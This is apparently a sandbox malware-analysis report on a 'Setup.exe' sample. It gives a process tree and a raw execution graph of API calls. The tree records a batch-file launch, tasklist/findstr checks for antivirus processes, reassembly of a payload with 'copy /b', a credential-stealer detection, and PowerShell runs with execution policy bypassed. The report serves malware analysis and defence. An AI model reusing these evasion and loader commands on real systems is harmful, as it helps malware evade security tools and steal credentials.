                                                                                                                                      Target ID:0
                                                                                                                                      Start time:09:11:54
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\'Setup.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:1'076'464 bytes
                                                                                                                                      MD5 hash:B00B38068B134113EB53676C33A59A93
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:09:11:54
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:09:11:54
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:09:11:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:tasklist
                                                                                                                                      Imagebase:0xb00000
                                                                                                                                      File size:79'360 bytes
                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:09:11:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:findstr /I "wrsa opssvc"
                                                                                                                                      Imagebase:0x630000
                                                                                                                                      File size:29'696 bytes
                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:09:11:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:tasklist
                                                                                                                                      Imagebase:0xb00000
                                                                                                                                      File size:79'360 bytes
                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:09:11:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                      Imagebase:0x630000
                                                                                                                                      File size:29'696 bytes
                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:09:11:58
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:cmd /c md 108941
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:09:11:58
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor A
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:09:11:58
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:Contrast.com A
                                                                                                                                      Imagebase:0x510000
                                                                                                                                      File size:893'608 bytes
                                                                                                                                      MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:09:11:58
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                      Imagebase:0x450000
                                                                                                                                      File size:28'160 bytes
                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:09:13:14
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1"
                                                                                                                                      Imagebase:0x760000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:09:13:14
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:09:13:16
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      Imagebase:0x7ff6ef0c0000
                                                                                                                                      File size:496'640 bytes
                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:09:13:17
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\5TM3JMZQCYKEYRKL75T8.ps1"
                                                                                                                                      Imagebase:0x760000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:09:13:17
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:17.5%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:21%
                                                                                                                                        Total number of Nodes:1482
                                                                                                                                        Total number of Limit Nodes:25
                                                                                                                                        execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 